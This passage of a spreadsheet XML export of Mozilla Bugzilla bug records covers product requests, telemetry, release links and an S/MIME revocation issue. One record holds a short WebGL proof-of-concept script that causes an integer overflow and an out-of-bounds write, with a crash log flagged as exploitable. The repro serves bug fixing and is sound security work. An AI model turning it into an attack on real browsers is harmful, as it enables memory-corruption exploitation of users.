        </is>
      </c>
      <c r="J5918" t="inlineStr">
        <is>
          <t>ISPDB Server</t>
        </is>
      </c>
      <c r="K5918" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5918" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5918" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5918" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5918" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5918" t="inlineStr"/>
      <c r="Q5918" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5918" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5918" t="inlineStr">
        <is>
          <t>Thunderbird 3.0rc1</t>
        </is>
      </c>
      <c r="T5918" t="n">
        <v>1</v>
      </c>
      <c r="U5918" t="n">
        <v>0</v>
      </c>
      <c r="V5918" t="n">
        <v>32</v>
      </c>
      <c r="W5918" t="inlineStr">
        <is>
          <t>First we would need to create the dtd, based off of the example in https://wiki.mozilla.org/Thunderbird:Autoconfiguration:ConfigFileFormat
Then we would need to fix our export to match it.
(Take a look at the differences between http://svn.mozilla.org/mozillamessaging.com/sites/autoconfig.mozillamessaging.com/trunk/mozilla.com%20disabled and http://ispdb.mozillamessaging.com/export_xml/17 for examples of what needs fixing.)</t>
        </is>
      </c>
      <c r="X5918" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5919">
      <c r="A5919" t="n">
        <v>1443383</v>
      </c>
      <c r="B5919" t="inlineStr">
        <is>
          <t>2018-03-05 19:16:31 -0800</t>
        </is>
      </c>
      <c r="C5919" t="inlineStr">
        <is>
          <t>Request for New Product "Emerging Market" and new corresponding Components</t>
        </is>
      </c>
      <c r="D5919" t="inlineStr">
        <is>
          <t>2019-01-15 20:53:28 -0800</t>
        </is>
      </c>
      <c r="E5919" t="n">
        <v>1</v>
      </c>
      <c r="F5919" t="n">
        <v>1</v>
      </c>
      <c r="G5919" t="n">
        <v>7</v>
      </c>
      <c r="H5919" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5919" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J5919" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K5919" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L5919" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5919" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5919" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5919" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5919" t="inlineStr"/>
      <c r="Q5919" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5919" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5919" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5919" t="n">
        <v>1</v>
      </c>
      <c r="U5919" t="n">
        <v>0</v>
      </c>
      <c r="V5919" t="n">
        <v>16</v>
      </c>
      <c r="W5919" t="inlineStr">
        <is>
          <t>We need to create a new Product for "Emerging Market Group" (a.k.a EMG).
Firefox Rocket is the first new product from EMG and we expect to see more coming.
Refer to 'user story' for more details.</t>
        </is>
      </c>
      <c r="X5919" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5920">
      <c r="A5920" t="n">
        <v>1549229</v>
      </c>
      <c r="B5920" t="inlineStr">
        <is>
          <t>2019-05-05 16:26:35 -0700</t>
        </is>
      </c>
      <c r="C5920" t="inlineStr">
        <is>
          <t>[meta] investigate impact of armagadd-on-2.0</t>
        </is>
      </c>
      <c r="D5920" t="inlineStr">
        <is>
          <t>2019-06-03 09:59:12 -0700</t>
        </is>
      </c>
      <c r="E5920" t="n">
        <v>1</v>
      </c>
      <c r="F5920" t="n">
        <v>1</v>
      </c>
      <c r="G5920" t="n">
        <v>5</v>
      </c>
      <c r="H5920" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5920" t="inlineStr">
        <is>
          <t>Data Science</t>
        </is>
      </c>
      <c r="J5920" t="inlineStr">
        <is>
          <t>Investigation</t>
        </is>
      </c>
      <c r="K5920" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5920" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5920" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5920" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5920" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5920" t="inlineStr"/>
      <c r="Q5920" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5920" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5920" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5920" t="n">
        <v>1</v>
      </c>
      <c r="U5920" t="n">
        <v>0</v>
      </c>
      <c r="V5920" t="n">
        <v>2</v>
      </c>
      <c r="W5920" t="inlineStr">
        <is>
          <t>## Brief Description of the request (required):
In bug 1548973, all Firefox extensions disabled due to expiration of intermediate signing cert that shipped with the client.
## Business purpose for this request (required):
Add-ons are very important to some users and could have an effect on retention.
## Requested timelines for the request or how this fits into roadmaps or critical decisions (required):
ASAP
## Links to any assets (e.g Start of a PHD, BRD; any document that helps describe the project):
https://docs.google.com/document/d/1E9RTVtmFmQC2aW3Zajpj34w4vM9O0191rBfJYSKrdOQ/edit#
## Name of Data Scientist (If Applicable):
*Please note if it is found that not enough information has been given this will delay the triage of this request.*
Please ping me or ckarlof if there are any questions or concerns, thanks!</t>
        </is>
      </c>
      <c r="X5920" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5921">
      <c r="A5921" t="n">
        <v>790879</v>
      </c>
      <c r="B5921" t="inlineStr">
        <is>
          <t>2012-09-13 00:58:16 -0700</t>
        </is>
      </c>
      <c r="C5921" t="inlineStr">
        <is>
          <t>integer overflow, invalid write w/webgl bufferdata</t>
        </is>
      </c>
      <c r="D5921" t="inlineStr">
        <is>
          <t>2024-05-30 07:33:11 -0700</t>
        </is>
      </c>
      <c r="E5921" t="n">
        <v>1</v>
      </c>
      <c r="F5921" t="n">
        <v>1</v>
      </c>
      <c r="G5921" t="n">
        <v>3</v>
      </c>
      <c r="H5921" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5921" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5921" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K5921" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5921" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5921" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5921" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5921" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5921" t="inlineStr">
        <is>
          <t>[adv-track-main17+][adv-track-esr17+][asan]</t>
        </is>
      </c>
      <c r="Q5921" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5921" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5921" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T5921" t="n">
        <v>1</v>
      </c>
      <c r="U5921" t="n">
        <v>0</v>
      </c>
      <c r="V5921" t="n">
        <v>25</v>
      </c>
      <c r="W5921" t="inlineStr">
        <is>
          <t>Created attachment 660738
repro
I load:
&lt;html&gt;
  &lt;head&gt;
    &lt;script&gt;
      gl=document.createElement('canvas').getContext('experimental-webgl')
      var buf = gl.createBuffer()
      gl.bindBuffer(gl.ARRAY_BUFFER, buf)
      var magic = 0x12345678
      gl.bufferData(gl.ARRAY_BUFFER, new Uint8Array(magic+1), gl.STATIC_DRAW)
      gl.bufferData(gl.ARRAY_BUFFER, Math.pow(2, 32), gl.STATIC_DRAW)
      gl.bufferSubData(gl.ARRAY_BUFFER, magic, new Uint8Array(1))
    &lt;/script&gt;
  &lt;/head&gt;
&lt;/html&gt;
and I get:
exception=EXC_BAD_ACCESS:signal=11:is_exploitable=yes:instruction_disassembly=movb	%al,(%rdi):instruction_address=0x00007fff92c82a41:access_type=write:access_address=0x0000000012345678:
Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x0000000012345678
Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0   libsystem_c.dylib             	0x00007fff92c82a41 memmove$VARIANT$sse42 + 57
1   GLEngine                      	0x000000010cfa9982 glBufferSubData_Exec + 856
  rdi: 0x0000000012345678
  r11: 0x0000000012345678
  r12: 0x0000000012345678
ASAN:SIGSEGV
==3966== ERROR: AddressSanitizer crashed on unknown address 0x000012345678 (pc 0x7fff92c82a41 sp 0x7fff5fbf5380 bp 0x7fff5fbf5380 T0)
AddressSanitizer can not provide additional info. ABORTING
    #0 0x7fff92c82a40 in memmove$VARIANT$sse42 (in libsystem_c.dylib) + 227
    #1 0x100009291 in wrap_memmove (in firefox) + 545
    #2 0x13add8981 in glDeleteBuffers_Exec (in GLEngine) + 1727
    #3 0x105d41d4a in mozilla::gl::GLContext::fBufferSubData(unsigned int, long, long, void const*) (in XUL) + 90
    #4 0x105d25b2f in mozilla::WebGLContext::BufferSubData(unsigned int, long long, mozilla::dom::TypedArray_base&lt;unsigned char, &amp;(JS_GetObjectAsArrayBufferView(JSContext*, JSObject*, unsigned int*, unsigned char**))&gt;&amp;) (in XUL) + 575</t>
        </is>
      </c>
      <c r="X5921" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5922">
      <c r="A5922" t="n">
        <v>1200944</v>
      </c>
      <c r="B5922" t="inlineStr">
        <is>
          <t>2015-09-01 21:38:30 -0700</t>
        </is>
      </c>
      <c r="C5922" t="inlineStr">
        <is>
          <t>Instrument UI Pref for TP in PBM with Telemetry probe</t>
        </is>
      </c>
      <c r="D5922" t="inlineStr">
        <is>
          <t>2016-05-10 09:11:12 -0700</t>
        </is>
      </c>
      <c r="E5922" t="n">
        <v>1</v>
      </c>
      <c r="F5922" t="n">
        <v>1</v>
      </c>
      <c r="G5922" t="n">
        <v>2</v>
      </c>
      <c r="H5922" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5922" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5922" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5922" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5922" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5922" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5922" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5922" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5922" t="inlineStr">
        <is>
          <t>[fxprivacy]</t>
        </is>
      </c>
      <c r="Q5922" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5922" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5922" t="inlineStr">
        <is>
          <t>Firefox 44</t>
        </is>
      </c>
      <c r="T5922" t="n">
        <v>1</v>
      </c>
      <c r="U5922" t="n">
        <v>0</v>
      </c>
      <c r="V5922" t="n">
        <v>11</v>
      </c>
      <c r="W5922" t="inlineStr">
        <is>
          <t>There is a UI editable pref under Preferences &gt; Privacy that enables TP in PBM. It is on by default in DevEdition now.
This is the pref:
privacy.trackingprotection.pbmode.enabled
We'd like to instrument this for telemetry so we can understand how many people globally disable TP. This may tell us: 1. how many people dislike TP in PBM, or 2. that our on/off switch is really hard to find. There is also now an on/off switch on the PBM built-in page itself. We just want to instrument the pref and can't know where it's been changed. We can't instrument anything that would reveal a user went to PBM</t>
        </is>
      </c>
      <c r="X5922" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5923">
      <c r="A5923" t="n">
        <v>1183932</v>
      </c>
      <c r="B5923" t="inlineStr">
        <is>
          <t>2015-07-14 18:18:26 -0700</t>
        </is>
      </c>
      <c r="C5923" t="inlineStr">
        <is>
          <t>Update onboarding for Fx 40 with single slide</t>
        </is>
      </c>
      <c r="D5923" t="inlineStr">
        <is>
          <t>2016-11-22 07:33:05 -0800</t>
        </is>
      </c>
      <c r="E5923" t="n">
        <v>1</v>
      </c>
      <c r="F5923" t="n">
        <v>1</v>
      </c>
      <c r="G5923" t="n">
        <v>2</v>
      </c>
      <c r="H5923" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5923" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5923" t="inlineStr">
        <is>
          <t>New Tab Page</t>
        </is>
      </c>
      <c r="K5923" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5923" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5923" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5923" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5923" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5923" t="inlineStr">
        <is>
          <t>.001</t>
        </is>
      </c>
      <c r="Q5923" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5923" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5923" t="inlineStr">
        <is>
          <t>Firefox 42</t>
        </is>
      </c>
      <c r="T5923" t="n">
        <v>1</v>
      </c>
      <c r="U5923" t="n">
        <v>0</v>
      </c>
      <c r="V5923" t="n">
        <v>79</v>
      </c>
      <c r="W5923" t="inlineStr">
        <is>
          <t>Created attachment 8633829
NT Privacy Notice.png
Since we're not going to display paid sponsorship for Fx 40, we're going to simplify the onboarding message with the bare necessity. Attached is the mock up. Uplift to beta 40 needed.</t>
        </is>
      </c>
      <c r="X5923" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5924">
      <c r="A5924" t="n">
        <v>489208</v>
      </c>
      <c r="B5924" t="inlineStr">
        <is>
          <t>2009-04-20 12:15:42 -0700</t>
        </is>
      </c>
      <c r="C5924" t="inlineStr">
        <is>
          <t>website: for each designer detail page, add designer-specific information</t>
        </is>
      </c>
      <c r="D5924" t="inlineStr">
        <is>
          <t>2013-05-07 21:49:51 -0700</t>
        </is>
      </c>
      <c r="E5924" t="n">
        <v>1</v>
      </c>
      <c r="F5924" t="n">
        <v>1</v>
      </c>
      <c r="G5924" t="n">
        <v>6</v>
      </c>
      <c r="H5924" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5924" t="inlineStr">
        <is>
          <t>Websites Graveyard</t>
        </is>
      </c>
      <c r="J5924" t="inlineStr">
        <is>
          <t>getpersonas.com</t>
        </is>
      </c>
      <c r="K5924" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5924" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5924" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5924" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5924" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5924" t="inlineStr"/>
      <c r="Q5924" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5924" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5924" t="inlineStr">
        <is>
          <t>1.3</t>
        </is>
      </c>
      <c r="T5924" t="n">
        <v>1</v>
      </c>
      <c r="U5924" t="n">
        <v>0</v>
      </c>
      <c r="V5924" t="n">
        <v>8</v>
      </c>
      <c r="W5924" t="inlineStr">
        <is>
          <t>for tracking purposes, parsing 489035 into separate bugs.
- header of page should present the name of the designer. 
- header should be followed by a text block for description of designer
- description of designer should be followed by each of the personas by
designer, with each including a preview image, its name, designer, date added,
summary description, number of daily active users and a link to its detail page
e.g.  [Preview Image]
      [Name] 
      Designer: [Designer]
      Added: [Date Added]
      [Summary Description]
      [Daily Active Users] daily active users
      view details&gt;&gt;
      [Preview Image]
      &lt;a&gt;Lady Gaga&lt;/a&gt;
      Designer: &lt;a&gt;Interscope Geffen A&amp;M&lt;/a&gt;
      Added: 3/30/2009
      Lady Gaga has exploded on to the dance pop
      music...
      1,234 daily active users
      &lt;a&gt;view details&amp;gt;gt;&lt;/a&gt;</t>
        </is>
      </c>
      <c r="X5924" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5925">
      <c r="A5925" t="n">
        <v>1008344</v>
      </c>
      <c r="B5925" t="inlineStr">
        <is>
          <t>2014-05-09 11:50:07 -0700</t>
        </is>
      </c>
      <c r="C5925" t="inlineStr">
        <is>
          <t>[solitude] Signing certs for payments-alt</t>
        </is>
      </c>
      <c r="D5925" t="inlineStr">
        <is>
          <t>2014-09-24 14:06:49 -0700</t>
        </is>
      </c>
      <c r="E5925" t="n">
        <v>1</v>
      </c>
      <c r="F5925" t="n">
        <v>1</v>
      </c>
      <c r="G5925" t="n">
        <v>2</v>
      </c>
      <c r="H5925" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5925" t="inlineStr">
        <is>
          <t>Cloud Services</t>
        </is>
      </c>
      <c r="J5925" t="inlineStr">
        <is>
          <t>Operations: Marketplace</t>
        </is>
      </c>
      <c r="K5925" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5925" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5925" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5925" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5925" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5925" t="inlineStr"/>
      <c r="Q5925" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5925" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5925" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5925" t="n">
        <v>1</v>
      </c>
      <c r="U5925" t="n">
        <v>0</v>
      </c>
      <c r="V5925" t="n">
        <v>5</v>
      </c>
      <c r="W5925" t="inlineStr">
        <is>
          <t>We have signing certs for payments-alt. Thanks!</t>
        </is>
      </c>
      <c r="X5925" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5926">
      <c r="A5926" t="n">
        <v>1283649</v>
      </c>
      <c r="B5926" t="inlineStr">
        <is>
          <t>2016-06-30 15:39:00 -0700</t>
        </is>
      </c>
      <c r="C5926" t="inlineStr">
        <is>
          <t>When an attachment is a github pull request link, the pull request diff should be displayed in the edit page</t>
        </is>
      </c>
      <c r="D5926" t="inlineStr">
        <is>
          <t>2016-07-19 12:21:07 -0700</t>
        </is>
      </c>
      <c r="E5926" t="n">
        <v>1</v>
      </c>
      <c r="F5926" t="n">
        <v>1</v>
      </c>
      <c r="G5926" t="n">
        <v>7</v>
      </c>
      <c r="H5926" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5926" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J5926" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5926" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L5926" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5926" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5926" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5926" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5926" t="inlineStr"/>
      <c r="Q5926" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5926" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5926" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5926" t="n">
        <v>1</v>
      </c>
      <c r="U5926" t="n">
        <v>1</v>
      </c>
      <c r="V5926" t="n">
        <v>9</v>
      </c>
      <c r="W5926" t="inlineStr">
        <is>
          <t>For example the github pull request https://github.com/bugzilla/bugzilla/pull/7
allows you to create a custom URL to see the diff of the pull request at
https://patch-diff.githubusercontent.com/raw/bugzilla/bugzilla/pull/7.diff
We should be able to load the contents of that link from the 'Details' page in the normal patch iframe. Then comments can be added, attributes changed, etc. to the bug report and attachment.
dkl</t>
        </is>
      </c>
      <c r="X5926" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5927">
      <c r="A5927" t="n">
        <v>1769000</v>
      </c>
      <c r="B5927" t="inlineStr">
        <is>
          <t>2022-05-12 00:27:29 -0700</t>
        </is>
      </c>
      <c r="C5927" t="inlineStr">
        <is>
          <t>Message signed with revoked S/MIME certificate shown as correctly signed</t>
        </is>
      </c>
      <c r="D5927" t="inlineStr">
        <is>
          <t>2023-01-26 16:31:50 -0800</t>
        </is>
      </c>
      <c r="E5927" t="n">
        <v>1</v>
      </c>
      <c r="F5927" t="n">
        <v>1</v>
      </c>
      <c r="G5927" t="n">
        <v>3</v>
      </c>
      <c r="H5927" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5927" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J5927" t="inlineStr">
        <is>
          <t>Security: S/MIME</t>
        </is>
      </c>
      <c r="K5927" t="inlineStr">
        <is>
          <t>Thunderbird 91</t>
        </is>
      </c>
      <c r="L5927" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5927" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5927" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5927" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5927" t="inlineStr"/>
      <c r="Q5927" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5927" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5927" t="inlineStr">
        <is>
          <t>111 Branch</t>
        </is>
      </c>
      <c r="T5927" t="n">
        <v>1</v>
      </c>
      <c r="U5927" t="n">
        <v>0</v>
      </c>
      <c r="V5927" t="n">
        <v>18</v>
      </c>
      <c r="W5927" t="inlineStr">
        <is>
          <t>Steps to reproduce:
Use Debian sid/unstable with *thunderbird* 1:91.8.1-1, and view a message signed with a revoked S/MIME certificate.
Actual results:
The message is displayed a correctly signed despite the certificate being revoked.
Expected results:
The message should be shown as incorrectly signed.
    $ openssl ocsp -issuer x-chain.pem -issuer GEANT_Personal_CA_4.pem -cert x.pem -url http://GEANT.ocsp.sectigo.com
    WARNING: no nonce in response
    Response verify OK
    x.pem: revoked
    	This Update: May  9 04:30:28 2022 GMT
    	Next Update: May 16 04:30:28 2022 GMT
    	Revocation Time: Dec  7 11:21:35 2021 GMT</t>
        </is>
      </c>
      <c r="X5927" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5928">
      <c r="A5928" t="n">
        <v>851622</v>
      </c>
      <c r="B5928" t="inlineStr">
        <is>
          <t>2013-03-15 12:41:51 -0700</t>
        </is>
      </c>
      <c r="C5928" t="inlineStr">
        <is>
          <t>Frequent ec2 disconnects causing most jobs to fail</t>
        </is>
      </c>
      <c r="D5928" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5928" t="n">
        <v>1</v>
      </c>
      <c r="F5928" t="n">
        <v>1</v>
      </c>
      <c r="G5928" t="n">
        <v>5</v>
      </c>
      <c r="H5928" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5928" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5928" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5928" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5928" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5928" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5928" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5928" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5928" t="inlineStr">
        <is>
          <t>[buildduty]</t>
        </is>
      </c>
      <c r="Q5928" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5928" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5928" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5928" t="n">
        <v>1</v>
      </c>
      <c r="U5928" t="n">
        <v>0</v>
      </c>
      <c r="V5928" t="n">
        <v>12</v>
      </c>
      <c r="W5928" t="inlineStr">
        <is>
          <t>All the trees are currently closed because at the moment, pretty much every ec2 job is being cut off prematurely.
https://tbpl.mozilla.org/php/getParsedLog.php?id=20699468&amp;tree=Mozilla-Inbound</t>
        </is>
      </c>
      <c r="X5928" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5929">
      <c r="A5929" t="n">
        <v>555556</v>
      </c>
      <c r="B5929" t="inlineStr">
        <is>
          <t>2010-03-28 09:24:00 -0700</t>
        </is>
      </c>
      <c r="C5929" t="inlineStr">
        <is>
          <t>Add Sunbird 1.0 beta1 builds to bouncer</t>
        </is>
      </c>
      <c r="D5929" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5929" t="n">
        <v>1</v>
      </c>
      <c r="F5929" t="n">
        <v>1</v>
      </c>
      <c r="G5929" t="n">
        <v>5</v>
      </c>
      <c r="H5929" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5929" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5929" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5929" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5929" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5929" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5929" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5929" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5929" t="inlineStr"/>
      <c r="Q5929" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5929" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5929" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5929" t="n">
        <v>1</v>
      </c>
      <c r="U5929" t="n">
        <v>0</v>
      </c>
      <c r="V5929" t="n">
        <v>5</v>
      </c>
      <c r="W5929" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #421555 +++
I'd like the following builds added to bouncer. We have a win32, linux-i686, linux-x86-64 and mac directory with all our supported locales as sub-directories under the operating system directory.
Links are of the following format:
Windows 1.0 b1 :
http://releases.mozilla.org/pub/mozilla.org/calendar/sunbird/releases/1.0b1/unsigned/win32/ab-CD/Sunbird%20Setup%201.0%20Beta%201.exe
Linux 32bit 1.0b1:
http://releases.mozilla.org/pub/mozilla.org/calendar/sunbird/releases/1.0b1/linux-i686/ab-CD/sunbird-1.0b1.tar.bz2
Linux 64bit 1.0b1:
http://releases.mozilla.org/pub/mozilla.org/calendar/sunbird/releases/1.0b1/linux-x86_64/ab-CD/sunbird-1.0b1.tar.bz2
Mac 1.0b1:
http://releases.mozilla.org/pub/mozilla.org/calendar/sunbird/releases/1.0b1/mac/ab-CD/Sunbird%201.0%20Beta%201.dmg
Hopefully this is the list you need to make the bouncer entries for the update
files:
-------------
Sunbird-1.0b1-Complete    linux 32bit
/calendar/sunbird/releases/1.0b1/update/linux-i686/ab-CD/sunbird-1.0b1.complete.mar
Sunbird-1.0b1-Complete    osx
/calendar/sunbird/releases/1.0b1/update/mac/ab-CD/sunbird-1.0b1.complete.mar
Sunbird-1.0b1-Complete    win   
/calendar/sunbird/releases/1.0b1/unsigned/update/win32/ab-CD/sunbird-1.0b1.complete.mar
-------------</t>
        </is>
      </c>
      <c r="X5929" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5930">
      <c r="A5930" t="n">
        <v>1621268</v>
      </c>
      <c r="B5930" t="inlineStr">
        <is>
          <t>2020-03-10 05:54:44 -0700</t>
        </is>
      </c>
      <c r="C5930" t="inlineStr">
        <is>
          <t>Hit MOZ_CRASH(Bad input type) at jit/MIR.cpp:2263</t>
        </is>
